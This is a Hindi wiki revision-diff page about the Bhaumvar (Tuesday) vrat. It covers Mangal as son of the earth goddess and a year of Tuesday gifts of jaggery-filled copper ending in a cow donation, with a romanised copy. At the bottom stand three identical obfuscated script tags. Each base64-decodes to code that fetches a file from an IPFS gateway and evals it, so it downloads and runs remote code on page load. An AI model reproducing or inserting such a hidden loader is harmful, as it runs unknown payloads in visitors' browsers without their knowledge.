Difference between revisions of "भौमवार व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[मंगल देवता|मंगल]] [[पृथ्वी देवी|पृथ्वी]] का पुत्र एवं देखने में सुन्दर होता है।  
 
*[[मंगल देवता|मंगल]] [[पृथ्वी देवी|पृथ्वी]] का पुत्र एवं देखने में सुन्दर होता है।  
*एक वर्ष तक प्रति मंगलवार को गुड़ से पूर्ण ताम्र देने से तथा अन्त में गौदान करने से सौन्दर्य एवं धन की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 2, 567)</ref>
+
*एक वर्ष तक प्रति मंगलवार को गुड़ से पूर्ण ताम्र देने से तथा अन्त में गौदान करने से सौन्दर्य एवं धन की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 2, 567</ref>
  
  

Latest revision as of 12:55, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • mangal prithvi ka putr evan dekhane mean sundar hota hai.
  • ek varsh tak prati mangalavar ko gu d se poorn tamr dene se tatha ant mean gaudan karane se saundary evan dhan ki prapti hoti hai.[1]



tika tippani aur sandarbh

  1. hemadri (vrat0 2, 567

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>